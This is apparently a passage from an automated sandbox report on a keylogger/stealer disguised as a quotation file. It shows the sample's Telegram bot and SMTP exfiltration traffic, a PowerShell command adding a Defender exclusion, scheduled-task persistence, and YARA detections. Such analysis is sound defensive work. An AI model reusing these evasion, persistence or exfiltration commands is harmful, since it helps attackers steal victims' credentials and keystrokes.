                                                                                                                                            2025-01-13 12:05:52 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            17192.168.2.849749149.154.167.2204431532C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:53 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:19:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-13 12:05:53 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:53 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 55
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2025-01-13 12:05:53 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            18192.168.2.849750104.21.112.14433760C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:53 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-13 12:05:53 UTC861INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:53 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084743
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hy%2BNbJii2LhAeC%2BeTGJKrfcz5FiLLnzlrUvaxJLmo6aHUtOhysNATogbGLc5teCiurIWsTbvrG%2FNrEHunu7WxhvBVRW0JAoYJpTgkzqLNIE3V%2B%2FjVAIBiqbn7pMqKw0%2BaqAfxuLX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541d3dcc243b3-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1540&min_rtt=1539&rtt_var=579&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1885087&cwnd=203&unsent_bytes=0&cid=7cd7e484f4aa3d19&ts=144&x=0"
                                                                                                                                            2025-01-13 12:05:53 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            19192.168.2.849751149.154.167.2204433760C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:54 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:09:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-13 12:05:54 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:54 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 55
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2025-01-13 12:05:54 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                            SMTP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                            Jan 13, 2025 13:06:00.032485008 CET58749752208.91.199.223192.168.2.8220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                                            Jan 13, 2025 13:06:00.032660007 CET49752587192.168.2.8208.91.199.223EHLO 179605
                                                                                                                                            Jan 13, 2025 13:06:00.182775974 CET58749752208.91.199.223192.168.2.8250-us2.outbound.mailhostbox.com
                                                                                                                                            250-PIPELINING
                                                                                                                                            250-SIZE 41648128
                                                                                                                                            250-VRFY
                                                                                                                                            250-ETRN
                                                                                                                                            250-STARTTLS
                                                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                                                            250-AUTH=PLAIN LOGIN
                                                                                                                                            250-ENHANCEDSTATUSCODES
                                                                                                                                            250-8BITMIME
                                                                                                                                            250-DSN
                                                                                                                                            250 CHUNKING
                                                                                                                                            Jan 13, 2025 13:06:00.183831930 CET49752587192.168.2.8208.91.199.223AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
                                                                                                                                            Jan 13, 2025 13:06:00.335897923 CET58749752208.91.199.223192.168.2.8334 UGFzc3dvcmQ6
                                                                                                                                            Jan 13, 2025 13:06:00.777559996 CET58749753208.91.199.223192.168.2.8220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                                            Jan 13, 2025 13:06:00.777909040 CET49753587192.168.2.8208.91.199.223EHLO 179605
                                                                                                                                            Jan 13, 2025 13:06:00.929347038 CET58749753208.91.199.223192.168.2.8250-us2.outbound.mailhostbox.com
                                                                                                                                            250-PIPELINING
                                                                                                                                            250-SIZE 41648128
                                                                                                                                            250-VRFY
                                                                                                                                            250-ETRN
                                                                                                                                            250-STARTTLS
                                                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                                                            250-AUTH=PLAIN LOGIN
                                                                                                                                            250-ENHANCEDSTATUSCODES
                                                                                                                                            250-8BITMIME
                                                                                                                                            250-DSN
                                                                                                                                            250 CHUNKING
                                                                                                                                            Jan 13, 2025 13:06:00.930090904 CET49753587192.168.2.8208.91.199.223AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
                                                                                                                                            Jan 13, 2025 13:06:02.463587999 CET58749752208.91.199.223192.168.2.8535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                                                                            Jan 13, 2025 13:06:02.464297056 CET49752587192.168.2.8208.91.199.223MAIL FROM:<director@igakuin.com>
                                                                                                                                            Jan 13, 2025 13:06:02.617162943 CET58749752208.91.199.223192.168.2.8250 2.1.0 Ok
                                                                                                                                            Jan 13, 2025 13:06:02.617480040 CET49752587192.168.2.8208.91.199.223RCPT TO:<director@igakuin.com>
                                                                                                                                            Jan 13, 2025 13:06:02.786401033 CET58749752208.91.199.223192.168.2.8554 5.7.1 <director@igakuin.com>: Relay access denied
                                                                                                                                            Jan 13, 2025 13:06:04.921638012 CET58749754208.91.199.223192.168.2.8220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                                            Jan 13, 2025 13:06:04.921943903 CET49754587192.168.2.8208.91.199.223EHLO 179605
                                                                                                                                            Jan 13, 2025 13:06:05.068191051 CET58749754208.91.199.223192.168.2.8250-us2.outbound.mailhostbox.com
                                                                                                                                            250-PIPELINING
                                                                                                                                            250-SIZE 41648128
                                                                                                                                            250-VRFY
                                                                                                                                            250-ETRN
                                                                                                                                            250-STARTTLS
                                                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                                                            250-AUTH=PLAIN LOGIN
                                                                                                                                            250-ENHANCEDSTATUSCODES
                                                                                                                                            250-8BITMIME
                                                                                                                                            250-DSN
                                                                                                                                            250 CHUNKING
                                                                                                                                            Jan 13, 2025 13:06:05.068413019 CET49754587192.168.2.8208.91.199.223AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
                                                                                                                                            Jan 13, 2025 13:06:05.082957983 CET58749753208.91.199.223192.168.2.8334 UGFzc3dvcmQ6
                                                                                                                                            Jan 13, 2025 13:06:05.217729092 CET58749754208.91.199.223192.168.2.8334 UGFzc3dvcmQ6
                                                                                                                                            Jan 13, 2025 13:06:07.202047110 CET58749754208.91.199.223192.168.2.8535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                                                                            Jan 13, 2025 13:06:07.202209949 CET49754587192.168.2.8208.91.199.223MAIL FROM:<director@igakuin.com>
                                                                                                                                            Jan 13, 2025 13:06:07.349786997 CET58749754208.91.199.223192.168.2.8250 2.1.0 Ok
                                                                                                                                            Jan 13, 2025 13:06:07.349939108 CET49754587192.168.2.8208.91.199.223RCPT TO:<director@igakuin.com>
                                                                                                                                            Jan 13, 2025 13:06:07.461673021 CET58749753208.91.199.223192.168.2.8535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                                                                            Jan 13, 2025 13:06:07.461899996 CET49753587192.168.2.8208.91.199.223MAIL FROM:<director@igakuin.com>
                                                                                                                                            Jan 13, 2025 13:06:07.512908936 CET58749754208.91.199.223192.168.2.8554 5.7.1 <director@igakuin.com>: Relay access denied
                                                                                                                                            Jan 13, 2025 13:06:07.614909887 CET58749753208.91.199.223192.168.2.8250 2.1.0 Ok
                                                                                                                                            Jan 13, 2025 13:06:07.615109921 CET49753587192.168.2.8208.91.199.223RCPT TO:<director@igakuin.com>
                                                                                                                                            Jan 13, 2025 13:06:07.782290936 CET58749753208.91.199.223192.168.2.8554 5.7.1 <director@igakuin.com>: Relay access denied
                                                                                                                                            Jan 13, 2025 13:06:09.974858046 CET58760445208.91.198.143192.168.2.8220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                                            Jan 13, 2025 13:06:09.978235960 CET60445587192.168.2.8208.91.198.143EHLO 179605
                                                                                                                                            Jan 13, 2025 13:06:10.130167961 CET58760445208.91.198.143192.168.2.8250-us2.outbound.mailhostbox.com
                                                                                                                                            250-PIPELINING
                                                                                                                                            250-SIZE 41648128
                                                                                                                                            250-VRFY
                                                                                                                                            250-ETRN
                                                                                                                                            250-STARTTLS
                                                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                                                            250-AUTH=PLAIN LOGIN
                                                                                                                                            250-ENHANCEDSTATUSCODES
                                                                                                                                            250-8BITMIME
                                                                                                                                            250-DSN
                                                                                                                                            250 CHUNKING
                                                                                                                                            Jan 13, 2025 13:06:10.130414009 CET60445587192.168.2.8208.91.198.143AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
                                                                                                                                            Jan 13, 2025 13:06:14.296427965 CET58760445208.91.198.143192.168.2.8334 UGFzc3dvcmQ6
                                                                                                                                            Jan 13, 2025 13:06:16.464901924 CET58760445208.91.198.143192.168.2.8535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                                                                            Jan 13, 2025 13:06:16.465246916 CET60445587192.168.2.8208.91.198.143MAIL FROM:<director@igakuin.com>
                                                                                                                                            Jan 13, 2025 13:06:16.616797924 CET58760445208.91.198.143192.168.2.8250 2.1.0 Ok
                                                                                                                                            Jan 13, 2025 13:06:16.617073059 CET60445587192.168.2.8208.91.198.143RCPT TO:<director@igakuin.com>
                                                                                                                                            Jan 13, 2025 13:06:16.787776947 CET58760445208.91.198.143192.168.2.8554 5.7.1 <director@igakuin.com>: Relay access denied

                                                                                                                                            Statistics

                                                                                                                                            CPU Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            Memory Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            High Level Behavior Distribution

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:07:05:31
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe"
                                                                                                                                            Imagebase:0x2f0000
                                                                                                                                            File size:948'224 bytes
                                                                                                                                            MD5 hash:DAC368E84E853ADEC2A5BB1CD87CD1C6
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1636139946.00000000068C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1632148313.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:3
                                                                                                                                            Start time:07:05:32
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe"
                                                                                                                                            Imagebase:0x310000
                                                                                                                                            File size:433'152 bytes
                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:4
                                                                                                                                            Start time:07:05:32
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:5
                                                                                                                                            Start time:07:05:32
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp"
                                                                                                                                            Imagebase:0xa20000
                                                                                                                                            File size:187'904 bytes
                                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:6
                                                                                                                                            Start time:07:05:32
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:7
                                                                                                                                            Start time:07:05:33
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                            Imagebase:0xfd0000
                                                                                                                                            File size:2'625'616 bytes
                                                                                                                                            MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.4059070573.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:8
                                                                                                                                            Start time:07:05:34
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe
                                                                                                                                            Imagebase:0x280000
                                                                                                                                            File size:948'224 bytes
                                                                                                                                            MD5 hash:DAC368E84E853ADEC2A5BB1CD87CD1C6
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.1660117333.0000000002849000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            • Detection: 39%, ReversingLabs
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:9
                                                                                                                                            Start time:07:05:34
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                            Imagebase:0x7ff605670000
                                                                                                                                            File size:496'640 bytes
                                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:10
                                                                                                                                            Start time:07:05:36
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmpA824.tmp"
                                                                                                                                            Imagebase:0xa20000
                                                                                                                                            File size:187'904 bytes
                                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:11
                                                                                                                                            Start time:07:05:36
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:12
                                                                                                                                            Start time:07:05:36
                                                                                                                                            Start date:13/01/2025
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                            Imagebase:0xfd0000
                                                                                                                                            File size:2'625'616 bytes
                                                                                                                                            MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000002.4058029996.000000000708E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Has exited:false

                                                                                                                                            Disassembly

                                                                                                                                            Reset < >

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:11.3%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:312
                                                                                                                                              Total number of Limit Nodes:20
